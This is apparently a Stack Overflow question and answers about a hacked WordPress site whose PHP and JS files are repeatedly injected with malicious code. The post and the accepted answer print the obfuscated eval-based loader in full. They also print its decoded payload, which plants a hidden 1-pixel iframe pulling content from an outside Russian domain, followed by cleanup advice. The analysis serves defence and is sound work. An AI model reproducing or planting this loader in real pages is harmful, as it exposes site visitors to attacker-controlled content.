# A malicious js is auto injecting into my header.php files and many other js files?

Tags: javascript, php, jquery, malware

Currently I am facing a hell like situation, four of my client websites were hacked before 10 days. I messed up a lot with them and three of them are working fine(running magento) after my long mess up with them, but one of them(running word press) is still facing the same situation and I could not figure out what was going on, after a particular timing the js files and some php files too are auto injecting with this kind of code :

```
<?
#ded509#
echo "<script type=\"text/javascript\" language=\"javascript\" > e=eval;v=\"0x\";a=0;try{a&=2}catch(q){a=1}if(!a){try{document[\"body\"]^=~1;}catch(q){a2=\"!\"}z=\"2f!6d!7c!75!6a!7b!70!76!75!27!2f!30!27!82!14!11!27!27!27!27!7d!68!79!27!6a!27!44!27!6b!76!6a!7c!74!6c!75!7b!35!6a!79!6c!68!7b!6c!4c!73!6c!74!6c!75!7b!2f!2e!70!6d!79!68!74!6c!2e!30!42!14!11!14!11!27!27!27!27!6a!35!7a!79!6a!27!44!27!2e!6f!7b!7b!77!41!36!36!71!68!72!80!7a!72!80!6d!35!79!7c!36!6a!76!7c!75!7b!38!3d!35!77!6f!77!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!77!76!7a!70!7b!70!76!75!27!44!27!2e!68!69!7a!76!73!7c!7b!6c!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!69!76!79!6b!6c!79!27!44!27!2e!37!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!6f!6c!70!6e!6f!7b!27!44!27!2e!38!77!7f!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!7e!70!6b!7b!6f!27!44!27!2e!38!77!7f!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!73!6c!6d!7b!27!44!27!2e!38!77!7f!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!7b!76!77!27!44!27!2e!38!77!7f!2e!42!14!11!14!11!27!27!27!27!70!6d!27!2f!28!6b!76!6a!7c!74!6c!75!7b!35!6e!6c!7b!4c!73!6c!74!6c!75!7b!49!80!50!6b!2f!2e!6a!2e!30!30!27!82!14!11!27!27!27!27!27!27!27!27!6b!76!6a!7c!74!6c!75!7b!35!7e!79!70!7b!6c!2f!2e!43!6b!70!7d!27!70!6b!44!63!2e!6a!63!2e!45!43!36!6b!70!7d!45!2e!30!42!14!11!27!27!27!27!27!27!27!27!6b!76!6a!7c!74!6c!75!7b!35!6e!6c!7b!4c!73!6c!74!6c!75!7b!49!80!50!6b!2f!2e!6a!2e!30!35!68!77!77!6c!75!6b!4a!6f!70!73!6b!2f!6a!30!42!14!11!27!27!27!27!84!14!11!84!30!2f!30!42\".split(a2);s=\"\";if(window.document)for(i=0;i<z.length;i++)     {s+=String.fromCharCode(e(v+(z[i]))-7);}zaz=s;e(zaz);}</script>";
#/ded509#
?>
```

This code is injected in all js files and main files, I changed ftp passwords, I checked cron jobs, and manually I looked up for any php code (I am feeling like some php code is doing this) but I am unable to figure it out, and yeah I tried to decode this code and tried to get the functionality for this code, yet removing this malicious code from my js files will make my site fine for some time, but after a random time the scripts will auto injected with this code ? what is this js code actually ? It will be very helpful if somebody explains what is actually going on ?

Comment: Is the site hosted in a shared server? Maybe the server itself is compromised, not only your domain. Check with the hosting provider.

Answer (score 8, accepted):

That PHP echo this

```
<script type="text/javascript" language="javascript" > e=eval;v="0x";a=0;try{a&=2}catch(q){a=1}if(!a){try{document["body"]^=~1;}catch(q){a2="!"}z="2f!6d!7c!75!6a!7b!70!76!75!27!2f!30!27!82!14!11!27!27!27!27!7d!68!79!27!6a!27!44!27!6b!76!6a!7c!74!6c!75!7b!35!6a!79!6c!68!7b!6c!4c!73!6c!74!6c!75!7b!2f!2e!70!6d!79!68!74!6c!2e!30!42!14!11!14!11!27!27!27!27!6a!35!7a!79!6a!27!44!27!2e!6f!7b!7b!77!41!36!36!71!68!72!80!7a!72!80!6d!35!79!7c!36!6a!76!7c!75!7b!38!3d!35!77!6f!77!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!77!76!7a!70!7b!70!76!75!27!44!27!2e!68!69!7a!76!73!7c!7b!6c!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!69!76!79!6b!6c!79!27!44!27!2e!37!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!6f!6c!70!6e!6f!7b!27!44!27!2e!38!77!7f!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!7e!70!6b!7b!6f!27!44!27!2e!38!77!7f!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!73!6c!6d!7b!27!44!27!2e!38!77!7f!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!7b!76!77!27!44!27!2e!38!77!7f!2e!42!14!11!14!11!27!27!27!27!70!6d!27!2f!28!6b!76!6a!7c!74!6c!75!7b!35!6e!6c!7b!4c!73!6c!74!6c!75!7b!49!80!50!6b!2f!2e!6a!2e!30!30!27!82!14!11!27!27!27!27!27!27!27!27!6b!76!6a!7c!74!6c!75!7b!35!7e!79!70!7b!6c!2f!2e!43!6b!70!7d!27!70!6b!44!63!2e!6a!63!2e!45!43!36!6b!70!7d!45!2e!30!42!14!11!27!27!27!27!27!27!27!27!6b!76!6a!7c!74!6c!75!7b!35!6e!6c!7b!4c!73!6c!74!6c!75!7b!49!80!50!6b!2f!2e!6a!2e!30!35!68!77!77!6c!75!6b!4a!6f!70!73!6b!2f!6a!30!42!14!11!27!27!27!27!84!14!11!84!30!2f!30!42".split(a2);s="";if(window.document)for(i=0;i<z.length;i++)     {s+=String.fromCharCode(e(v+(z[i]))-7);}zaz=s;e(zaz);}</script>
```

In readable form it looks like this

```
e = eval;

v = "0x";
a = 0;
try {
    a &= 2
} catch (q) {
    a = 1
}
if (!a) {
    try {
        document["body"] ^= ~1;
    } catch (q) {
        a2 = "!"
    }
    z = "2f!6d!7c!75!6a!7b!70!76!75!27!2f!30!27!82!14!11!27!27!27!27!7d!68!79!27!6a!27!44!27!6b!76!6a!7c!74!6c!75!7b!35!6a!79!6c!68!7b!6c!4c!73!6c!74!6c!75!7b!2f!2e!70!6d!79!68!74!6c!2e!30!42!14!11!14!11!27!27!27!27!6a!35!7a!79!6a!27!44!27!2e!6f!7b!7b!77!41!36!36!71!68!72!80!7a!72!80!6d!35!79!7c!36!6a!76!7c!75!7b!38!3d!35!77!6f!77!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!77!76!7a!70!7b!70!76!75!27!44!27!2e!68!69!7a!76!73!7c!7b!6c!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!69!76!79!6b!6c!79!27!44!27!2e!37!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!6f!6c!70!6e!6f!7b!27!44!27!2e!38!77!7f!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!7e!70!6b!7b!6f!27!44!27!2e!38!77!7f!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!73!6c!6d!7b!27!44!27!2e!38!77!7f!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!7b!76!77!27!44!27!2e!38!77!7f!2e!42!14!11!14!11!27!27!27!27!70!6d!27!2f!28!6b!76!6a!7c!74!6c!75!7b!35!6e!6c!7b!4c!73!6c!74!6c!75!7b!49!80!50!6b!2f!2e!6a!2e!30!30!27!82!14!11!27!27!27!27!27!27!27!27!6b!76!6a!7c!74!6c!75!7b!35!7e!79!70!7b!6c!2f!2e!43!6b!70!7d!27!70!6b!44!63!2e!6a!63!2e!45!43!36!6b!70!7d!45!2e!30!42!14!11!27!27!27!27!27!27!27!27!6b!76!6a!7c!74!6c!75!7b!35!6e!6c!7b!4c!73!6c!74!6c!75!7b!49!80!50!6b!2f!2e!6a!2e!30!35!68!77!77!6c!75!6b!4a!6f!70!73!6b!2f!6a!30!42!14!11!27!27!27!27!84!14!11!84!30!2f!30!42".split(a2);
    s = "";
    if (window.document) for (i = 0; i < z.length; i++) {
            s += String.fromCharCode(e(v + (z[i])) - 7);
    }
    zaz = s;
    e(zaz);
}
```

In the above code `e` is the function `eval`

If we remove eval and prints the contents of `zaz` it will look like this.

```
(function () {
    var c = document.createElement('iframe');

    c.src = 'http://jakyskyf.ru/count16.php';
    c.style.position = 'absolute';
    c.style.border = '0';
    c.style.height = '1px';
    c.style.width = '1px';
    c.style.left = '1px';
    c.style.top = '1px';

    if (!document.getElementById('c')) {
        document.write('<div id=\'c\'></div>');
        document.getElementById('c').appendChild(c);
    }
})();
```

Its a self executing anonymous function. The script creates an iframe in your page and load contents from `http://jakyskyf.ru/count16.php`

If your server is hosted in a shared server maybe the admin account itself is compromised.

**Things you can do.**

- Your best place to check is server logs. Check for some malicious entries.
- Check with your hosting provider.
- Change your password to a strong password.
- Normally in wordpress sites this thing happends (it happened in lot of my wordpress sites). If you are using wordpress update to latest version.
- Change the admin username from `admin` to someother name.
- Change your admin email and password. Hacker might have changed it.

**These links will provide you more inputs**

- [Iframe Virus](http://en.wikipedia.org/wiki/Iframe_virus)
- [Iframe injection attack](https://stackoverflow.com/questions/11955634/iframe-injection-attack-followed-us-to-new-server)
- [Server wide iFrame injection attacks](http://blog.unmaskparasites.com/2012/08/13/rfi-server-wide-iframe-injections/)
- [Hidden iFrame injection attacks](http://diovo.com/2009/03/hidden-iframe-injection-attacks/)

Comment: how can i get rid of it ?

Comment: answer updated with more info

Answer (score 0):

You'll have to change the permissions of your root directory files or the files that are being repeatedly hacked to 444. Make sure you change permissions of all index.php/html files and .htaccess files to read only. Also giving a 555 permission js directory and files would help.

This is the quick solution to stop being spammed again and again. To find the root of this you'll have to check your database entries for common forms like contact_us etc which might be taking scripts without proper sanitization filters. Also remove any unknown files from your root directory.

Comment: files permissions are currently 604 and folder permissions are currently 705, do i still need to change ?

Comment: Yes, but not all folders. Only the bare files under root directory, all .htaccess files, all index.php and index.html files and the js directory and its files. Generally these malicious scripts find their way through .htaccess and index files. If you try changing permissions of all directories your project might stop working.